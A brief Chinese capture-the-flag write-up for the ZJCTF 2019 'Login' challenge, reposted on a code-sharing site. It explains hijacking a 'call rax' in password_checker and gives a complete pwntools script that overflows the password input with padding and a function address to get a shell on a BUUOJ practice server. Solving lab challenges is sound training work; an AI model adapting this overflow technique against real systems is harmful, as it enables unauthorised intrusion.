[ZJCTF 2019]Login


exp 腳本

  C++寫的程序,逆向分析有點費勁。注意到 password_checker 有 call rax 指令,倒推 rax 的來源,在 main 函數中把 rax 的來源覆蓋為漏洞函數的地址即可 get shell

from pwn import *

io = remote('node3.buuoj.cn',27283)

shell = 0x400e88
io.sendlineafter(': ','admin')
io.sendlineafter(': ','2jctf_pa5sw0rd'+'\x00'*58+p64(shell))

io.interactive()

感謝 keer 師傅的指點!


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM